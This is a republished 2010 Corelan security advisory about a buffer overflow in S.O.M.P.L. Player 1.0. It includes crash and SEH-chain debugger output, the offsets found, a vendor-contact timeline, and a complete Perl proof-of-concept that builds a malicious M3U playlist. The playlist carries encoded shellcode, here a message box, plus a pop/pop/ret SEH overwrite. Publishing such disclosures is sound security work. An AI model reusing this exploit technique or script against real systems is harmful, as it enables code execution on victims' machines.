Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23083
HistoryJan 20, 2010 - 12:00 a.m.

[CORELAN-10-006] BOF Vulnerability in S.O.M.P.L. Player

2010-01-2000:00:00
vulners.com
12
JSON

|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / / __ \/ / _ \/ / __ `/ __ \ / / _ \/ __ `/ __ ` \ |
| / // // / / / __/ / // / / / / / // __/ // / / / / / / |
| \/\// \//\,// // \/\/\__,// // // |
| |
| http://www.corelan.be:8800 |
| [email protected] |
| |
|-------------------------------------------------[ EIP Hunters ]–|
| |
| Vulnerability Disclosure Report |

Advisory : CORELAN-10-006
Disclosure date : 20 January 2010
http://www.corelan.be:8800/index.php/forum/security-advisories/

0x00 : Vulnerability information

[] Product : S.O.M.P.L player
[] Version : 1.0
[] Vendor : George Fesalides
[] URL : http://sourceforge.net/projects/somplmp3/files/
[] URL2 : http://www.softpedia.com/progDownload/SOMPL-Download-144999.html
[] Platform : Windows
[] Type of vulnerability : Buffer Overflow
[] Risk rating : Medium
[] Issue fixed in version : ???
[] Vulnerability discovered by : Rick2600
[*] Greetings to : corelanc0d3r, EdiStrosar, mr_me, ekse, MarkoT, sinn3r

0x01 : Vendor description of software

S.O.M.PL. Is a Simple Open Music Player that plays mp3 files. This player loads mp3 files and stores them in a
playlist. It includes features such as random tracks selection,tracks repetition,loading playlist, saving playlist.

0x02 : Vulnerability details

The discovered vulnerability allows an attacker to send a crafted malicious playlist (M3U) whereby
the user could be tricked into executing unauthorized commands.
In order for the vulnerability to be triggered, an end user must be tricked into loading a malicious
playlist (M3U) on SOMPL.

Crash information :

(dc.e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=41414141 ecx=00000000 edx=00000000 esi=0012eb48 edi=00000000
eip=40004ae4 esp=0012eb18 ebp=0012fb4c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
VCL50!SystemLStrClr$qqrr17SystemAnsiString:
40004ae4 8b10 mov edx,dword ptr [eax] ds:0023:41414141=???
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:000> !exchain
0012eb2c: VCL50!StdctrlsTRadioButtonCNCommand$qqrr19MessagesTWMCommand+e6 (40048762)
0012fb7c: 41414141
Invalid exception stack at 41414141

!pvefindaddr findmsp :

Log data
0BADF00D -------------------------------------------------------------------------
0BADF00D Searching for metasploit pattern references
0BADF00D -------------------------------------------------------------------------
0BADF00D [1] Checking register addresses and contents
0BADF00D ============================================
0BADF00D Register EDI points to Metasploit pattern at position 0
0BADF00D Register EAX is overwritten with Metasploit pattern at position 4096
0BADF00D Register EBP points to Metasploit pattern at position 4100
0BADF00D Register EDX points to Metasploit pattern at position 0
0BADF00D Register EBX is overwritten with Metasploit pattern at position 4096
0BADF00D Register ESI points to Metasploit pattern at position 0
0BADF00D [2] Checking seh chain
0BADF00D ======================
0BADF00D - Checking seh chain entry at 0x0012eb2c, value 40048762
0BADF00D - Checking seh chain entry at 0x0012fb7c, value 46346946
0BADF00D => record is overwritten with Metasploit pattern at position 4152
0BADF00D -------------------------------------------------------------------------

0x03 : Vendor communication

[] 28 dec 2009 : Vendor contacted - no reply
[] 09 jan 2010 : Vendor contacted again - still no reply
[*] 20 jan 2010 : Public disclosure

0x04 : Exploit/PoC

Exploit Title : SOMPL Player Buffer Overflow

Date : 20 January 2010

Author : Rick2600 (ricks2600[at]gmail{dot}com)

Bug found by : Rick2600 (ricks2600[at]gmail{dot}com)

Software Link : http://www.softpedia.com/progDownload/SOMPL-Download-144999.html

Version : 1.0

Issue fixed in: ???

OS : Windows

Tested on : XP SP2 and SP3 En

Type of vuln : Buffer Overflow

Greetz to : Corelan Security Team:: corelanc0d3r, EdiStrosar, mr_me, ekse, MarkoT, sinn3r

Script provided 'as is', without any warranty.

Use for educational purposes only.

Code :

print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / / __ \\/ / _ \\/ / __ `/ __ \\ / / _ \\/ __ `/ __ ` \\ |\n";
print "| / // // / / / __/ / // / / / / / // __/ // / / / / / / |\n";
print "| \\/\\// \\//\\,// // \\/\\/\\__,// // // |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]–|\n";
print "[+] SOMPL Player Buffer Overflow - SEH Overwrite\n";

$header = "#EXTM3U\n#EXTINF:";

#Shellcode: x86/alpha_mixed( MsgBox )
$shellcode =
"\x89\xe7\xdb\xcf\xd9\x77\xf4\x59\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x48\x6b\x44\x62\x50\x56\x46\x51\x4b\x70\x42" .
"\x44\x4c\x4b\x43\x70\x46\x50\x4b\x35\x4b\x70\x51\x68\x44" .
"\x4c\x4e\x6b\x47\x30\x44\x4c\x4c\x4b\x50\x70\x47\x6c\x4c" .
"\x6d\x4c\x4b\x43\x70\x46\x68\x4a\x4b\x46\x69\x4c\x4b\x43" .
"\x70\x44\x74\x4e\x6d\x43\x70\x51\x6c\x4c\x4b\x47\x30\x45" .
"\x6c\x43\x6e\x4f\x33\x48\x6b\x45\x39\x45\x30\x4c\x4b\x42" .
"\x4c\x51\x34\x51\x34\x4e\x6b\x43\x75\x47\x4c\x4e\x6b\x51" .
"\x44\x47\x75\x43\x48\x46\x61\x49\x7a\x4e\x6b\x50\x4a\x47" .
"\x68\x4e\x6b\x42\x7a\x51\x30\x43\x31\x4a\x4b\x4a\x43\x50" .
"\x34\x47\x39\x4c\x4b\x44\x74\x4c\x4b\x43\x31\x48\x6e\x50" .
"\x31\x4b\x4f\x45\x61\x49\x50\x4b\x4c\x4c\x6c\x4d\x54\x49" .
"\x50\x44\x34\x43\x37\x4a\x61\x48\x4f\x46\x6d\x46\x61\x48" .
"\x47\x48\x6b\x4b\x44\x45\x6b\x43\x4c\x44\x64\x46\x48\x50" .
"\x75\x4d\x31\x4c\x4b\x43\x6a\x51\x34\x47\x71\x48\x6b\x50" .
"\x66\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x46" .
"\x61\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x46\x61\x48\x68\x4d" .
"\x59\x47\x34\x46\x44\x45\x4c\x50\x61\x4f\x33\x4e\x4d\x42" .
"\x70\x46\x32\x48\x68\x4f\x5a\x4b\x4f\x4b\x4f\x49\x6f\x4e" .
"\x69\x43\x37\x51\x54\x51\x54\x47\x34\x43\x74\x43\x74\x47" .
"\x34\x43\x74\x42\x64\x47\x37\x47\x37\x50\x47\x42\x67\x50" .
"\x39\x48\x4e\x51\x65\x4b\x56\x4a\x63\x42\x6c\x50\x4c\x42" .
"\x6c\x42\x6c\x4d\x59\x4b\x55\x4b\x58\x45\x38\x4b\x4f\x49" .
"\x6f\x49\x6f\x4c\x49\x4b\x72\x48\x6b\x45\x4c\x51\x4e\x4c" .
"\x4d\x51\x6d\x45\x54\x4e\x69\x4c\x31\x4b\x30\x49\x51\x46" .
"\x6c\x48\x68\x4f\x38\x49\x6f\x49\x6f\x4b\x4f\x48\x6b\x47" .
"\x65\x45\x61\x49\x42\x51\x49\x4c\x48\x42\x71\x42\x34\x43" .
"\x61\x42\x72\x4b\x4f\x50\x54\x44\x64\x44\x4c\x4a\x48\x4b" .
"\x6f\x4b\x4f\x4b\x4f\x4b\x4f\x51\x47\x51\x6f\x51\x39\x42" .
"\x42\x48\x68\x48\x66\x4b\x4f\x49\x6f\x49\x6f\x47\x33\x42" .
"\x4f\x43\x42\x51\x75\x42\x4c\x50\x61\x42\x4e\x51\x30\x50" .
"\x54\x51\x75\x43\x51\x50\x6d\x51\x30\x44\x6d\x47\x50\x42" .
"\x70\x42\x77\x50\x4e\x50\x45\x42\x64\x42\x78\x41\x41";

$filename = "somplPOC.m3u";
print "[+] Check: $filename\n\n";

$buffer = "\x90" x 5;
$buffer .= $shellcode;
$buffer .= "B" x (4138 - length($shellcode));
$buffer .= "\xE9\xCD\xEF\xFF\xFF";
$buffer .= "\xEB\xF9\x90\x90";
$buffer .= pack("V", 0x32501B07); # pop/pop/ret Universal from cc3250mt.dll

open (FILE, ">$filename");
print FILE $buffer;
close(FILE);

JSON